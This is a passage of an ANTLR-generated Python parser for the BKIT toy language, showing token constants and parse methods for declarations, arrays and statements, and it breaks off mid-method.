RULE_init_for = 27\n RULE_con_for = 28\n RULE_update_for = 29\n RULE_expr = 30\n RULE_expr1 = 31\n RULE_expr2 = 32\n RULE_expr3 = 33\n RULE_expr4 = 34\n RULE_expr5 = 35\n RULE_expr6 = 36\n RULE_expr7 = 37\n RULE_expr8 = 38\n RULE_operand = 39\n RULE_function_call = 40\n RULE_index_op = 41\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"array\", \n \"primitive_data\", \"composite_data\", \"array_lit\", \"var_list\", \n \"scalar_var\", \"var_non_init\", \"composite_var\", \"var_init\", \n \"composite_init\", \"primitive_init\", \"params_list\", \"stmt_list\", \n \"stmt\", \"if_stmt\", \"var_declare_stmt\", \"for_stmt\", \"while_stmt\", \n \"dowhile_stmt\", \"assign_stmt\", \"break_stmt\", \"continue_stmt\", \n \"call_stmt\", \"return_stmt\", \"init_for\", \"con_for\", \"update_for\", \n \"expr\", \"expr1\", \"expr2\", \"expr3\", \"expr4\", \"expr5\", \n \"expr6\", \"expr7\", \"expr8\", \"operand\", \"function_call\", \n \"index_op\" ]\n\n EOF = Token.EOF\n ID=1\n INT_LIT=2\n FLOAT_LIT=3\n BOOL_LIT=4\n STRING_LIT=5\n BODY=6\n BREAK=7\n CONTINUE=8\n DO=9\n ELSE=10\n ELSEIF=11\n ENDIF=12\n ENDBODY=13\n ENDFOR=14\n ENDWHILE=15\n FOR=16\n FUNCTION=17\n IF=18\n PARAMETER=19\n RETURN=20\n THEN=21\n VAR=22\n WHILE=23\n TRUE=24\n FALSE=25\n ENDDO=26\n PLUS_INT=27\n 
PLUS_FLOAT=28\n MINUS_INT=29\n MINUS_FLOAT=30\n STAR_INT=31\n STAR_FLOAT=32\n DIV_INT=33\n DIV_FLOAT=34\n MOD=35\n NOT=36\n AND=37\n OR=38\n EQUAL=39\n NOT_EQUAL_INT=40\n LESS_INT=41\n GREATER_INT=42\n LESS_OR_EQUAL_INT=43\n GREATER_OR_EQUAL_INT=44\n NOT_EQUAL_FLOAT=45\n LESS_FLOAT=46\n GREATER_FLOAT=47\n LESS_OR_EQUAL_FLOAT=48\n GREATER_OR_EQUAL_FLOAT=49\n LEFT_PAREN=50\n RIGHT_PAREN=51\n LEFT_BRACKET=52\n RIGHT_BRACKET=53\n LEFT_BRACE=54\n RIGHT_BRACE=55\n COLON=56\n DOT=57\n SEMI=58\n COMMA=59\n ASSIGN=60\n DOUBLE_QUOTE=61\n INT_OF_FLOAT=62\n INT_OF_STRING=63\n FLOAT_TO_INT=64\n FLOAT_OF_STRING=65\n BOOL_OF_STRING=66\n STRING_OF_BOOL=67\n STRING_OF_INT=68\n STRING_OF_FLOAT=69\n COMMENT=70\n WS=71\n ILLEGAL_ESCAPE=72\n UNCLOSE_STRING=73\n UNTERMINATED_COMMENT=74\n ERROR_CHAR=75\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, 
self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 89\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 84\n self.var_declare()\n self.state = 85\n self.match(BKITParser.SEMI)\n self.state = 91\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 95\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.FUNCTION:\n self.state = 92\n self.function_declare()\n self.state = 97\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 98\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def COLON(self):\n return self.getToken(BKITParser.COLON, 0)\n\n def var_list(self):\n return self.getTypedRuleContext(BKITParser.Var_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 100\n self.match(BKITParser.VAR)\n self.state = 101\n self.match(BKITParser.COLON)\n self.state = 102\n self.var_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, 
invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def params_list(self):\n return self.getTypedRuleContext(BKITParser.Params_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 104\n self.match(BKITParser.FUNCTION)\n self.state = 105\n self.match(BKITParser.COLON)\n self.state = 106\n self.match(BKITParser.ID)\n self.state = 110\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.PARAMETER:\n self.state = 107\n self.match(BKITParser.PARAMETER)\n self.state = 108\n self.match(BKITParser.COLON)\n self.state = 109\n self.params_list()\n\n\n self.state = 112\n self.match(BKITParser.BODY)\n self.state = 113\n self.match(BKITParser.COLON)\n self.state = 114\n self.stmt_list()\n self.state = 115\n self.match(BKITParser.ENDBODY)\n self.state = 116\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class 
ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 118\n self.match(BKITParser.ID)\n self.state = 119\n self.match(BKITParser.ASSIGN)\n self.state = 120\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT_LIT(self):\n return self.getToken(BKITParser.INT_LIT, 0)\n\n def FLOAT_LIT(self):\n return self.getToken(BKITParser.FLOAT_LIT, 0)\n\n def STRING_LIT(self):\n return self.getToken(BKITParser.STRING_LIT, 0)\n\n def BOOL_LIT(self):\n return self.getToken(BKITParser.BOOL_LIT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_data\n\n\n\n\n def primitive_data(self):\n\n localctx = BKITParser.Primitive_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_primitive_data)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 122\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT))) != 0)):\n 
self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_data\n\n\n\n\n def composite_data(self):\n\n localctx = BKITParser.Composite_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_composite_data)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 124\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_litContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def primitive_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,i)\n\n\n def composite_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Composite_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n 
def getRuleIndex(self):\n return BKITParser.RULE_array_lit\n\n\n\n\n def array_lit(self):\n\n localctx = BKITParser.Array_litContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_array_lit)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 126\n self.match(BKITParser.LEFT_BRACE)\n self.state = 129\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 127\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 128\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 138\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 131\n self.match(BKITParser.COMMA)\n self.state = 134\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 132\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 133\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 140\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 141\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def var_init(self, i:int=None):\n if i is None:\n 
return self.getTypedRuleContexts(BKITParser.Var_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_list\n\n\n\n\n def var_list(self):\n\n localctx = BKITParser.Var_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_var_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 145\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,6,self._ctx)\n if la_ == 1:\n self.state = 143\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 144\n self.var_init()\n pass\n\n\n self.state = 154\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 147\n self.match(BKITParser.COMMA)\n self.state = 150\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,7,self._ctx)\n if la_ == 1:\n self.state = 148\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 149\n self.var_init()\n pass\n\n\n self.state = 156\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Scalar_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_scalar_var\n\n\n\n\n def scalar_var(self):\n\n localctx = BKITParser.Scalar_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_scalar_var)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state 
= 157\n self.match(BKITParser.ID)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_non_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_non_init\n\n\n\n\n def var_non_init(self):\n\n localctx = BKITParser.Var_non_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_var_non_init)\n try:\n self.state = 168\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 159\n self.match(BKITParser.ID)\n self.state = 163 \n self._errHandler.sync(self)\n _alt = 1\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt == 1:\n self.state = 160\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 161\n self.match(BKITParser.INT_LIT)\n self.state = 162\n self.match(BKITParser.RIGHT_BRACKET)\n\n else:\n raise NoViableAltException(self)\n self.state = 165 \n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,9,self._ctx)\n\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 167\n self.match(BKITParser.ID)\n pass\n\n\n except 
RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def composite_var(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Composite_varContext)\n else:\n return self.getTypedRuleContext(BKITParser.Composite_varContext,i)\n\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_var\n\n\n\n\n def composite_var(self):\n\n localctx = BKITParser.Composite_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_composite_var)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 170\n self.match(BKITParser.ID)\n self.state = 177 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 171\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 174\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.state = 172\n self.composite_var()\n pass\n elif token in [BKITParser.INT_LIT]:\n self.state = 173\n self.match(BKITParser.INT_LIT)\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 176\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 179 
\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def composite_data(self):\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_init\n\n\n\n\n def var_init(self):\n\n localctx = BKITParser.Var_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_var_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 183\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,13,self._ctx)\n if la_ == 1:\n self.state = 181\n self.composite_var()\n pass\n\n elif la_ == 2:\n self.state = 182\n self.scalar_var()\n pass\n\n\n self.state = 185\n self.match(BKITParser.ASSIGN)\n self.state = 188\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.LEFT_BRACE]:\n self.state = 186\n self.composite_data()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 187\n self.primitive_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n 
self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_init\n\n\n\n\n def composite_init(self):\n\n localctx = BKITParser.Composite_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_composite_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 190\n self.composite_var()\n self.state = 191\n self.match(BKITParser.ASSIGN)\n self.state = 192\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_init\n\n\n\n\n def primitive_init(self):\n\n localctx = BKITParser.Primitive_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_primitive_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 194\n self.scalar_var()\n self.state = 195\n self.match(BKITParser.ASSIGN)\n self.state = 196\n 
self.primitive_data()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Params_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_params_list\n\n\n\n\n def params_list(self):\n\n localctx = BKITParser.Params_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_params_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 198\n self.var_non_init()\n self.state = 203\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 199\n self.match(BKITParser.COMMA)\n self.state = 200\n self.var_non_init()\n self.state = 205\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Stmt_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n 
if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt_list\n\n\n\n\n def stmt_list(self):\n\n localctx = BKITParser.Stmt_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_stmt_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 211\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 206\n self.var_declare_stmt()\n self.state = 207\n self.match(BKITParser.SEMI)\n self.state = 213\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 217\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 214\n self.stmt() \n self.state = 219\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def if_stmt(self):\n return self.getTypedRuleContext(BKITParser.If_stmtContext,0)\n\n\n def for_stmt(self):\n return self.getTypedRuleContext(BKITParser.For_stmtContext,0)\n\n\n def while_stmt(self):\n return self.getTypedRuleContext(BKITParser.While_stmtContext,0)\n\n\n def dowhile_stmt(self):\n return self.getTypedRuleContext(BKITParser.Dowhile_stmtContext,0)\n\n\n def assign_stmt(self):\n return 
self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def break_stmt(self):\n return self.getTypedRuleContext(BKITParser.Break_stmtContext,0)\n\n\n def continue_stmt(self):\n return self.getTypedRuleContext(BKITParser.Continue_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def return_stmt(self):\n return self.getTypedRuleContext(BKITParser.Return_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 32, self.RULE_stmt)\n try:\n self.state = 239\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,18,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 220\n self.if_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 221\n self.for_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 222\n self.while_stmt()\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 223\n self.dowhile_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n self.state = 224\n self.assign_stmt()\n self.state = 225\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 6:\n self.enterOuterAlt(localctx, 6)\n self.state = 227\n self.break_stmt()\n self.state = 228\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 7:\n self.enterOuterAlt(localctx, 7)\n self.state = 230\n self.continue_stmt()\n self.state = 231\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 8:\n self.enterOuterAlt(localctx, 8)\n self.state = 233\n self.call_stmt()\n self.state = 234\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 9:\n self.enterOuterAlt(localctx, 9)\n self.state = 236\n self.return_stmt()\n self.state = 237\n self.match(BKITParser.SEMI)\n pass\n\n\n except RecognitionException as re:\n 
